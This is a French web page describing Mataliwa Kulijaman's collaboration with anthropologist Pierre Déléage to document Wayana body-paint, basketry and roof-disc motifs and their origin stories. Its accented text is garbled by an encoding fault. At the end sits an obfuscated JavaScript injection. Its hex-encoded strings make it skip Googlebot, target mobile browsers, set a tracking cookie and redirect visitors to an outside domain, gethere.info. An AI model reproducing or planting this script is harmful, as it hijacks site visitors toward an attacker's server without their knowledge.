Mataliwa KULIJAMAN et Pierre DA�LA�AGE

Mataliwa KULIJAMAN, chercheur indA�pendant ;A�kulijaman@yahoo.fr

Pierre DA�LA�AGE, anthropologue, Laboratoire da��anthropologie sociale (CNRS) ;A�deleagepierre@hotmail.com

 

Travail collaboratif sur la��inscription, A�crite et iconographique, de la mA�moire wayanaA�; origine et usages des expressions graphiques traditionnelles (Guyane).A�

Mataliwa Kulijaman est le fils du plus grand conteur des Wayana de Guyane franA�aise. A� partir des annA�es 1990, sa maA�trise du franA�ais et de la��A�criture, exceptionnelle chez les Wayana de son A?ge, en a fait le prA�cieux collaborateur da��ethnologues, de musicologues et de linguistes. Il est devenu le co-auteur des livres bilingues Wayana eitoponpA�. Une histoire orale des Indiens Wayana et KaptA�lo. L’origine du ciel de case et du roseau A� flA?ches chez les Wayana. La rA�alisation de ces deux ouvrages, dirigA�s la��un par Jean Chapuis et HervA� RiviA?re, la��autre par A�liane Camargo, lui a ouvert un nouvel horizon. Il a dA�cidA� de devenir lui-mA?me auteur A� part entiA?re.

Je suis Wayana, je vis A� la��intA�rieur de la Guyane, dans le village Antecume Pata. La tradition wayana ma��intA�resse, ja��aime A�crire sur cette tradition. Mais les jeunes aujourda��hui na��arrivent plus A� enregistrer mentalement les histoires. Autrefois, sans savoir A�crire, la tA?te A�tait A� la��A�coute. Aujourda��hui la tradition est devenue rare, trA?s rare. Ma pensA�e, ca��est qua��A�crire fait que la tradition reste en vie, qua��elle ne meurt pas. Comme A�a peut-A?tre plus tard, si les jeunes Wayana veulent connaA�tre leur culture, ils pourront consulter mes livres dans les bibliothA?ques.

Mataliwa A�tudie en particulier les traditions artistiques wayana, constituA�es da��un large rA�pertoire de A� motifs A� (imilikut) auxquels correspond un nom prA�cis. Ces motifs sont peints sur le corps ou les poteries, sont tressA�s dans les vanneries ou sont dessinA�s sur le disque de bois suspendu au sommet de la maison collective (A� ciel de case A�). Mataliwa sa��intA�resse A� ces traditions pour les faire revivre.

En 1999 je me suis intA�ressA� aux dessins du ciel de case. Je demandais A� mon pA?re qui ma��expliquait. La��annA�e suivante, ja��ai fabriquA� des pendentifs ornA�s de ces motifs et je les ai portA�s. Ensuite tous les jeunes du village et des autres villages ont commencA� A� utiliser ces motifs. Pour les boucles da��oreille, pour les pirogues.

En 2006 je me suis intA�ressA� aux autres motifs car ils sont la beautA� des Wayana. La peinture sur le corps A�tait notre vA?tement, nous nous habillions de traits qui nous enveloppaient le corps. Ja��ai demandA� aux anciens de les dessiner. Jusqua��A� prA�sent, ja��ai rA�uni environ soixante- quinze motifs. Je veux tout copier.

A�Et en 2009 les jeunes ont commencA� A� sa��y intA�resser aussi, da��abord en faisant des peintures corporelles avec le genipa pendant le carnaval, puis en fabriquant des bracelets de perles, des colliers, des ceintures. Aujourda��hui tous les jeunes portent ces motifs. Les jeunes se rA�veillent, ils veulent revoir comment A�tait la tradition. Au dA�but ja��A�tais seul.

Depuis, Mataliwa A�crit son propre livre. Le travail consiste A� A�tablir une typologie des motifs en fonction de leurs supports et A� A�tudier leurs modifications formelles de gA�nA�ration en gA�nA�ration.

Je veux comparer les techniques de fabrication des objets anciens et des objets da��aujourda��hui. Je veux aussi comparer les formes des motifs, voir sa��il y en a que la��on ne fait plus, voir si certains ont changA� avec le temps, voir si les motifs sont toujours les mA?mes. Ja��ai visitA� plusieurs musA�es europA�ens, ce qui ma��a permis de comprendre qua��il na��y a pas que les Wayana qui possA?dent des motifs, les EuropA�ens aussi, da��autres peuples aussi. Ca��est important de publier cela.

ParallA?lement Mataliwa transcrit en wayana et traduit en franA�ais les rA�cits racontant la��origine des diffA�rentes traditions artistiques. Il souhaite ainsi confronter les connaissances issues de son A�tude musA�ologique au savoir mythologique de son peuple.

Plusieurs rA�cits racontent la��origine des motifs, comment les Wayana ont acquis tous les motifs. Le rA�cit du monstre Tulupele explique la��origine des motifs de vannerie. Les rA�cits des Kujuli, de la��anaconda et de la chenille expliquent la��origine des peintures corporelles. Le rA�cit de TA?lA�panasi explique la��origine des dessins du ciel de case. Mon livre sera la mA�moire partagA�e des Wayana.

Dans ce projet, le rA?le de Pierre DA�lA�age consiste A� assurer le travail da��A�dition, au sens large, des textes de Mataliwa.

Pour en savoir plus

Mataliwa Kulijaman & Pierre DA�lA�age, 2012, Imilikut eitoponpA� : inscriptions originelles wayana, Vacarme 58, p. 204-217.

Disponible en ligne (sans la��iconographie) : http://www.vacarme.org/article2120.html
A�
A� A� A� A�A�

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}